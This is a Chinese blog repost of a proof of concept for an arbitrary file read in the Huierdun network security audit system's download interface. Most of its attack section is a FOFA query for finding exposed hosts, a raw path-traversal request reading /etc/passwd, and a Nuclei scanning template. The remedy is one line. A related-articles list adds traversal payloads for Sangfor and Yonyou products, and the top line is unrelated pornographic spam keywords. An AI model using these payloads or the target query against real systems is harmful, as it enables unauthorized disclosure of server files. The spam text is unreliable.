国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

<span id="kh9bo"></span>

<rp id="kh9bo"></rp>

惠爾頓安全審計(jì)系統(tǒng)任意文件讀取漏洞

2年前作者：Love Seed分類：Toy博客閱讀(18)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了惠爾頓安全審計(jì)系統(tǒng)任意文件讀取漏洞。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方，請(qǐng)大家不吝賜教，您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

免責(zé)聲明：文章來源互聯(lián)網(wǎng)收集整理，請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試，由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，所產(chǎn)生的一切不良后果與文章作者無關(guān)。該文章僅供學(xué)習(xí)用途使用。

Ⅰ、漏洞描述

對(duì)于軍民融合政策的諸多中小企業(yè)來講，大部分人員主要時(shí)間都時(shí)在非涉密區(qū)工作，并需要用到網(wǎng)絡(luò)，所以上網(wǎng)時(shí)不小心泄密成了一個(gè)可能泄密的高概率事件。?惠爾頓?通過?三員化管理、實(shí)名認(rèn)證上網(wǎng)、網(wǎng)頁記錄、郵件審查、文件上傳下載、即時(shí)通訊、防私接、統(tǒng)計(jì)報(bào)表?等八大方面確保上網(wǎng)不泄密。

網(wǎng)絡(luò)安全審計(jì)產(chǎn)品致力于滿足軍工四證、軍工保密室建設(shè)、國(guó)家涉密網(wǎng)絡(luò)建設(shè)的審計(jì)要求，規(guī)范網(wǎng)絡(luò)行為，滿足國(guó)家的規(guī)范；支持1-3線路的internet接入、1-3對(duì)網(wǎng)橋；含強(qiáng)大的上網(wǎng)行為管理、審計(jì)、監(jiān)控模塊；用戶訪問功能，內(nèi)容過濾功能；流量控制功能、帶寬管理功能；增強(qiáng)的應(yīng)用安全擴(kuò)展；強(qiáng)大的應(yīng)用協(xié)議分析與報(bào)表功能。

惠爾頓網(wǎng)絡(luò)安全審計(jì)系統(tǒng)download接口處存在任意文件讀取漏洞，惡意攻擊者可能會(huì)利用此漏洞獲取服務(wù)器敏感信息，從而造成信息泄露。

影響版本

version≤10

惠爾頓安全審計(jì)系統(tǒng)任意文件讀取漏洞,安全,web安全,網(wǎng)絡(luò)

Ⅱ、fofa語句

app="惠爾頓-網(wǎng)絡(luò)安全審計(jì)系統(tǒng)"

Ⅲ、漏洞復(fù)現(xiàn)

POC

GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip
Connection: close

1、構(gòu)建poc

惠爾頓安全審計(jì)系統(tǒng)任意文件讀取漏洞,安全,web安全,網(wǎng)絡(luò)

Ⅳ、Nuclei-POC

id: Huierdun-read

info:
  name: 惠爾頓網(wǎng)絡(luò)安全審計(jì)系統(tǒng)download接口處存在任意文件讀取漏洞，惡意攻擊者可能會(huì)利用此漏洞獲取服務(wù)器敏感信息，從而造成信息泄露。
  author: WLF
  severity: high
  metadata: 
    fofa-query: app="惠爾頓-網(wǎng)絡(luò)安全審計(jì)系統(tǒng)"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Accept-Encoding: gzip
        Connection: close


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"bin/bash")

惠爾頓安全審計(jì)系統(tǒng)任意文件讀取漏洞,安全,web安全,網(wǎng)絡(luò)

Ⅴ、修復(fù)建議

升級(jí)至安全版本文章來源地址http://www.zghlxwxcb.cn/news/detail-835733.html

到了這里，關(guān)于惠爾頓安全審計(jì)系統(tǒng)任意文件讀取漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來自互聯(lián)網(wǎng)用戶投稿，該文觀點(diǎn)僅代表作者本人，不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請(qǐng)注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符，請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋，一經(jīng)查實(shí)，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

深信服應(yīng)用交付報(bào)表系統(tǒng) download.php 任意文件讀取漏洞
漏洞描述：深信服應(yīng)用交付報(bào)表系統(tǒng) download.php文件存在任意文件讀取漏洞，攻擊者通過漏洞可以下載服務(wù)器任意文件。漏洞利用條件: download.php文件接口漏洞影響范圍：應(yīng)用交付報(bào)表系統(tǒng) 漏洞復(fù)現(xiàn)： 1、登錄頁面： ? 2.poc：/report/download.php?pdf=../../../../../etc/passwd ? 修復(fù)建
2024年02月11日
瀏覽(26)
若依 4.7.6 版本任意文件下載漏洞（審計(jì)復(fù)現(xiàn)）
https://mp.weixin.qq.com/s/IrqLp2Z3c941NiN0fFcDMA 這是一個(gè)最新版漏洞先說審計(jì)后結(jié)論，要實(shí)現(xiàn) 任意文件下載漏洞，需要執(zhí)行3次請(qǐng)求（Tips：需要先登錄RouYi） 1、新增計(jì)劃任務(wù) 2、執(zhí)行新增的計(jì)劃任務(wù) 3、訪問下載文件接口參考文章里給出 POC 1 和 POC 2（沒有給出內(nèi)部實(shí)現(xiàn)關(guān)鍵信息，嘗
2023年04月11日
瀏覽(24)
世邦 IP網(wǎng)絡(luò)對(duì)講廣播系統(tǒng) getjson.php接口存在任意文件讀取漏洞
產(chǎn)品簡(jiǎn)介 SPON世邦I(lǐng)P網(wǎng)絡(luò)對(duì)講廣播系統(tǒng)是一種先進(jìn)的通信解決方案，旨在提供高效的網(wǎng)絡(luò)對(duì)講和廣播功能。漏洞概述 SPON世邦I(lǐng)P網(wǎng)絡(luò)對(duì)講廣播系統(tǒng)getjson.php接口處存在任意文件讀取漏洞，未經(jīng)身份驗(yàn)證的攻擊者可利用此漏洞讀取敏感文件。指紋識(shí)別 fofa: 漏洞利用 poc: 修復(fù)建議
2024年02月03日
瀏覽(25)
世邦通信SPON IP網(wǎng)絡(luò)對(duì)講廣播系統(tǒng)rj_get_token.php 任意文件讀取漏洞
產(chǎn)品介紹世邦通信SPON IP網(wǎng)絡(luò)對(duì)講廣播系統(tǒng)采用領(lǐng)先的IPAudio?技術(shù),將音頻信號(hào)以數(shù)據(jù)包形式在局域網(wǎng)和廣域網(wǎng)上進(jìn)行傳送,是一套純數(shù)字傳輸系統(tǒng)。漏洞描述 spon IP網(wǎng)絡(luò)對(duì)講廣播系統(tǒng)rj_get_token.php存在任意文件讀取漏洞，攻擊者可通過該漏洞在服務(wù)器端讀取任意敏感文件。資產(chǎn)
2024年01月25日
瀏覽(42)
億賽通電子文檔安全管理系統(tǒng)任意文件上傳漏洞復(fù)現(xiàn)
? ? 億賽通電子文檔安全管理系統(tǒng)（簡(jiǎn)稱：CDG）是一款電子文檔安全加密軟件，該系統(tǒng)利用驅(qū)動(dòng)層透明加密技術(shù)，通過對(duì)電子文檔的加密保護(hù)，防止內(nèi)部員工泄密和外部人員非法竊取企業(yè)核心重要數(shù)據(jù)資產(chǎn)，對(duì)電子文檔進(jìn)行全生命周期防護(hù)，系統(tǒng)具有透明加密、主動(dòng)加密、智
2024年02月12日
瀏覽(25)
用友U8+ CRM任意文件上傳、任意文件讀取實(shí)戰(zhàn)
用友CRM系統(tǒng)，使用量非常廣,這里存在任意文件讀取漏洞、任意文件上傳漏洞存在漏洞的文件為： /ajax/getemaildata.php 訪問 http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1filePath=../version.txt 可以看到用友版本 7.2 patch2 訪問 http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1filePath=c:/windows/win.
2024年02月12日
瀏覽(19)
億賽通電子文檔安全管理系統(tǒng)任意文件上傳漏洞(2023-HW)
免責(zé)聲明：請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試，由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，所產(chǎn)生的一切不良后果與文章作者無關(guān)。該文章僅供學(xué)習(xí)用途使用。 ? 億賽通電子文檔安全管理系統(tǒng)（簡(jiǎn)稱：
2024年02月12日
瀏覽(21)
任意文件讀取漏洞
任意文件讀取漏洞（Arbitrary File Read Vulnerability）是指攻擊者可以通過web應(yīng)用程序讀取任意文件而不受訪問控制限制的漏洞。這種漏洞可能導(dǎo)致敏感信息泄露、系統(tǒng)崩潰等問題。攻擊者可以利用任意文件讀取漏洞訪問服務(wù)器上的任意文件，包括密碼文件、配置文件等，從而獲取
2024年02月15日
瀏覽(21)
任意文件讀取和漏洞復(fù)現(xiàn)
一些網(wǎng)站的需求，可能會(huì)提供文件查看與下載的功能。如果對(duì)用戶查看或下載的文件沒有限制或者限制繞過，就可以查看或下載任意文件。這些文件可以是漂代碼文件，配置文件，敏感文件等等。任意文件讀取會(huì)造成（敏感）信息泄露：任意文件讀取大多數(shù)情況是由于其他
2024年02月09日
瀏覽(20)
任意文件讀取與下載漏洞
任意文件讀取是屬于文件操作漏洞的一種，一般任意文件讀取漏洞可以讀取配置信息甚至系統(tǒng)重要文件。其中的目錄遍歷是由于web服務(wù)器或者web應(yīng)用程序?qū)τ脩糨斎氲奈募Q的安全性驗(yàn)證不足而導(dǎo)致的一種安全漏洞，使得攻擊者通過利用一些特殊字符就可以繞過服務(wù)器的安
2023年04月09日
瀏覽(25)

<span id="jiflz"></span>

<noscript id="jiflz"></noscript>